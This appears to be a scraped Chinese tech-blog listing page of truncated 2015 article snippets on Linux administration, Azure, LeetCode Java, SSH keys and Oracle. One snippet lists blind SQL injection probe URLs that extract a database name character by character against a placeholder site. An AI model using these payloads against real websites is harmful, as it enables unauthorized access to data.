企业内部如果使用自己的Yum服务器,不但占用带宽少、速度更快,而且可以更加灵活方便的自定义配置,能有效提升日常工作效率。一、基本概念1.RPM全称是TheRPMPackageManager。用于在CentOS系统中安装/卸载软件。2.Yum全称是YellowDogUpdaterModified。用于管理RPM包,完成安装/..
分类:
其他好文 时间:
2015-01-04 19:37:13
阅读次数:
186
分类:
其他好文 时间:
2015-01-04 19:36:24
阅读次数:
87
VisualStudio2015发布WebSites到MirosoftVistualMachines(IAAS)上一节我们介绍了通过VisualStudio2015如何连接到WindowsAzurePortal,今天呢我们就介绍如何使用VistualStudio2015发布一个web站点到WindowsAzureVM,当然我们也知道通过Vs发布web站点到windowsazure一共有三种..
分类:
Web程序 时间:
2015-01-04 19:34:07
阅读次数:
274
#!/bin/shCHECK_RUN(){if["$?"="0"];thenecho"===============Run[$1]succeed!==============="sleep3elseecho"Error,abort!"exit2fi}./telnet_restart.shstart./telnet_restart.shstatussleep3echo""echo""USER=`whoami`if[$USER!=root];thenecho"Mustberoottorunthisscript,p..
分类:
其他好文 时间:
2015-01-04 19:35:52
阅读次数:
204
1、解释top命令和vmstat命令2、请写出iptables语句3、mysql高可用方案有哪些?mysql备份方案有哪些?有什么缺点?4、写出Apache2.x的两种工作模式,以及各自的工作原理。如何查看Apache当前支持的模块。并查看在哪种模式下工作。5、linux基础问题(1)、linux怎么查看用户登录..
分类:
系统相关 时间:
2015-01-04 19:35:52
阅读次数:
311
redhat4.8升级openssh6.6报错现象:提示OpenSSLversionmismatch.Builtagainst1000000f,youhave信息,whereissshdssh:/usr/local/sshd发现该sshd的路径跟正常的as4.8的路径不一样:sshd:/usr/sbin/sshd登陆进去,发现sshd的路径为/usr/local/sbin/sshd,现在已改为/usr/sbin/sshd..
分类:
其他好文 时间:
2015-01-04 19:33:52
阅读次数:
1584
https://oj.leetcode.com/problems/combinations/http://blog.csdn.net/linhuanmars/article/details/21260217publicclassSolution{
publicList<List<Integer>>combine(intn,intk)
{
List<List<Integer>>results=newArrayList<>();
help(n,k,0,n..
分类:
其他好文 时间:
2015-01-04 19:34:42
阅读次数:
125
(一)网络架构客户端A:
操作系统:windows
本地连接:
ip:192.168.1.149网关:192.168.1.1(路由器地址)dns:192.168.1.1(路由器地址)子网掩码:255.255.255.0
VMwareNetworkAdapterVMnet1:
ip:192.168.3.1(用来和虚拟机通信)
服务器B:
操作系统:linux(虚拟机)
eth1:采用桥接模式..
分类:
其他好文 时间:
2015-01-04 19:34:42
阅读次数:
568
https://oj.leetcode.com/problems/subsets/http://blog.csdn.net/linhuanmars/article/details/24286377publicclassSolution{
publicList<List<Integer>>subsets(int[]S){
Arrays.sort(S);
List<List<Integer>>results=newArrayList<>();
hel..
分类:
其他好文 时间:
2015-01-04 19:34:20
阅读次数:
306
https://oj.leetcode.com/problems/subsets/http://blog.csdn.net/linhuanmars/article/details/24286377publicclassSolution{
publicList<List<Integer>>subsets(int[]S){
Arrays.sort(S);
List<List<Integer>>results=newArrayList<>();
hel..
分类:
其他好文 时间:
2015-01-04 19:35:38
阅读次数:
146
实例:1、routeadd-net192.168.2.0netmask255.255.255.0deveth0添加一条到达192.168.2.0网络的路由,指定网络掩码为255.255.255.0,数据包通过网络接口eth0。2、routeadd-net192.57.66.0netmask255.255.255.0gw192.168.2.1添加一条到达192.57.66.0网络的路由,指定网络掩码为255..
分类:
其他好文 时间:
2015-01-04 19:35:17
阅读次数:
119
http://www.x.com/sections_intr.php?id=181andlength((database()))=4http://www.x.com/sections_intr.php?id=181andascii(substring((database()),1,1))=122http://www.x.com/sections_intr.php?id=181andascii(substring((database()),2,1))=122http://www.x.com/sections_i..
分类:
其他好文 时间:
2015-01-04 19:32:48
阅读次数:
248
之前写过,后来很久不写,既然全部忘记了。这里重新学习Oracle的存储过程,希望看到的人不要见笑。首先都知道存储过程的开头语句是CREATEORREPLACEPROCEDURE(VARintype,VARouttype,.....)AS|IS但从变量申明开始变量类型有哪些?BEGIN后逻辑语句有哪些,我就记不清楚了。这里先..
分类:
数据库 时间:
2015-01-04 19:32:06
阅读次数:
230
node1:172.16.58.1node2:172.16.58.3node1-->node2首先在node1生成秘钥执行命令ssh-keygen-P‘‘询问保存路径直接回车默认即可,后面提示私钥保存为/root/.ssh/id_rsa公钥保存为/root/.ssh/id_rsa.pub[root@node1~]#ssh-keygen-P‘‘Generatingpublic/privatersakeypair.Enterfi..
分类:
其他好文 时间:
2015-01-04 19:33:24
阅读次数:
207
https://oj.leetcode.com/problems/word-search/http://blog.csdn.net/linhuanmars/article/details/24336987publicclassSolution{
publicbooleanexist(char[][]board,Stringword)
{
Map<Character,List<P>>map=buildMap(board);
booleanr=visit(map,word.toCharAr..
分类:
其他好文 时间:
2015-01-04 19:33:20
阅读次数:
146
https://oj.leetcode.com/problems/remove-duplicates-from-sorted-array-ii/http://blog.csdn.net/linhuanmars/article/details/24343525publicclassSolution{
publicintremoveDuplicates(int[]A){
if(A==null)
return-1;//invalidinput
if(A.length==0||A.length==1)
retur..
分类:
其他好文 时间:
2015-01-04 19:32:41
阅读次数:
133
python学习第五周字符串相关学习内容总结与作业第五周主要是对字符串相关操作的学习包括字符串的定义字符的序列基本字符运算求长度len(str)函数拼接+str=str1+‘pinjie’重复*name*3就是把name的字符串内容输出三次成员运算in判断一个字符串是否是另一个字符串的子串for语句枚..
分类:
编程语言 时间:
2015-01-04 19:31:23
阅读次数:
423